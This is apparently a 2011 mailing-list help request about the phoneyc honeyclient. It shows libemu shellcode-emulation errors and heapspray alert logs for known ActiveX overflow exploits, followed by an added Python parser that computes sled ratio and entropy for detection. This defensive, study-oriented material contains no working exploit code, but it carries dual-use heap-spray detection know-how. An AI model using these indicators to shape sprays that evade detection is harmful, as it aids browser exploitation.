Marta
May 15, 2011, 2:16:00 PM
to phoneyc
Hi!
I've been fighting with this problem nearly all day, searching everywhere for similar problems and repeating the steps... but no luck for me.
I've followed all the instructions, in both modes (Option 1 & Option 2). Heapspray attacks are correctly detected, and shellcodes are detected but can't be executed.
libemu -> trunk version (0.2.0)
curl -> 7.19.7
python -> 2.6.5
(Ubuntu Server 10.04)
Could you help me with this? I'm a beginner with honeyclients.
Thanks for your time and patience.
I leave here two execution samples:
*Shellcode can't be executed*:
sudo python ./phoneyc.py file://samples/4158.html
[2011-05-15 20:01:49] [ALERT] NeoTracePro.TraceTarget overflow in arg0
Log written into: log/ad5048081277127857aad08e0bfd5e55
====================================
|--------AID:1----------
|ATYPE:ALERT_SHELLCODE
|MESSAGE:Shellcode Detected!
|MISC:{}
|LENGTH:752
|SHELLCODE:
|Now run it:
Traceback (most recent call last):
File "./phoneyc.py", line 194, in <module>
report(alerts)
File "./phoneyc.py", line 119, in report
shellcoderesult = alert.run_shellcode()
File "/home/marta/phoneyc_v0_1_rev1631/lib/python/hcalert.py", line 31, in run_shellcode
return e.run_shellcode(self.shellcode,self.offset)
AttributeError: 'libemu.Emulator' object has no attribute 'run_shellcode'
*Heapspray attack detected ok*
sudo python ./phoneyc.py file://samples/Pps.html
[2011-05-15 19:59:35] [ALERT] PPStream (PowerPlayer.dll 2.0.1.3829)
ActiveX Remote Overflow Exploit in Logo property
Log written into: log/3a47adf41c41079156ee8c0fe439c70e
====================================
|--------AID:1----------
|ATYPE:ALERT_HEAPSPRAY
|MESSAGE:Heapspray Detected!
|HIT:3
|MEMUSAGE:524044
|LENGTH:524044
|ENTROPY:0.0
|MISC:{'sledge_char': '\x90', 'sec_char_cnt': 0, 'sledge_cnt': 524044, 'sec_char': '\x00'}
====================================
|--------AID:2----------
|ATYPE:ALERT_HEAPSPRAY
|MESSAGE:Heapspray Detected!
|HIT:400
|MEMUSAGE:209699200
|LENGTH:524248
|ENTROPY:0.00735793427204
|MISC:{'sledge_char': '\x90', 'sec_char_cnt': 12, 'sledge_cnt': 524045, 'sec_char': '\x8b'}
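The `|KEY:VALUE` report blocks above are phoneyc's alert format, and the MISC line is a Python dict literal that carries attacker-influenced bytes (the sled byte and the secondary byte found in the sprayed page). The following is an added example, not code from the post or from the phoneyc project: it parses that report into records with `ast.literal_eval` (never `eval`) and recomputes two of the heapspray indicators, the sled ratio and the byte entropy, over constructed buffers. The sample log text is the two ALERT_HEAPSPRAY records from the post; `shannon_entropy` and `sled_ratio` are assumed approximations of what phoneyc reports, not its exact formulas.

```python
import ast
import math
import re
from collections import Counter

# Constructed sample: the two ALERT_HEAPSPRAY records quoted in the post,
# with each MISC dict back on a single line.
SAMPLE_LOG = """\
====================================
|--------AID:1----------
|ATYPE:ALERT_HEAPSPRAY
|MESSAGE:Heapspray Detected!
|HIT:3
|MEMUSAGE:524044
|LENGTH:524044
|ENTROPY:0.0
|MISC:{'sledge_char': '\\x90', 'sec_char_cnt': 0, 'sledge_cnt': 524044, 'sec_char': '\\x00'}
====================================
|--------AID:2----------
|ATYPE:ALERT_HEAPSPRAY
|MESSAGE:Heapspray Detected!
|HIT:400
|MEMUSAGE:209699200
|LENGTH:524248
|ENTROPY:0.00735793427204
|MISC:{'sledge_char': '\\x90', 'sec_char_cnt': 12, 'sledge_cnt': 524045, 'sec_char': '\\x8b'}
"""

AID_RE = re.compile(r"^\|-+AID:(\d+)-+$")


def _coerce(key, value):
    """Turn the text after 'KEY:' into a typed value."""
    if key == "MISC":
        # The dict literal comes from page-derived data: literal_eval only
        # accepts constants, so a hostile value cannot run code here.
        return ast.literal_eval(value)
    if key in ("HIT", "MEMUSAGE", "LENGTH"):
        return int(value)
    if key == "ENTROPY":
        return float(value)
    return value


def parse_alerts(text):
    """Split a phoneyc report into one dict per '|----AID:n----' block."""
    alerts = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = AID_RE.match(line)
        if m:
            current = {"AID": int(m.group(1))}
            alerts.append(current)
            continue
        if current is None or not line.startswith("|") or ":" not in line:
            continue  # separator rows and anything outside a block
        key, _, value = line[1:].partition(":")
        current[key] = _coerce(key, value)
    return alerts


def sled_ratio(alert):
    """Fraction of the sprayed block made of the sled byte (assumed metric)."""
    return alert["MISC"]["sledge_cnt"] / alert["LENGTH"]


def shannon_entropy(buf):
    """Bits per byte of a byte string; a uniform NOP sled scores 0.0."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


if __name__ == "__main__":
    for a in parse_alerts(SAMPLE_LOG):
        print(a["AID"], a["ATYPE"], "hits=%d sled_ratio=%.5f entropy=%.5f"
              % (a["HIT"], sled_ratio(a), a["ENTROPY"]))
    # Constructed buffers: a pure sled versus a sled with a second byte mixed in.
    print(shannon_entropy(b"\x90" * 1000), shannon_entropy(b"\x90" * 512 + b"\x8b" * 512))
```

The high sled ratio (over 99.9% of the block is `\x90`) combined with near-zero entropy and a large HIT count is what makes the second alert a convincing spray rather than a single large but benign allocation; a parser like this lets you feed the fields into your own thresholds or a SIEM instead of reading the report by eye.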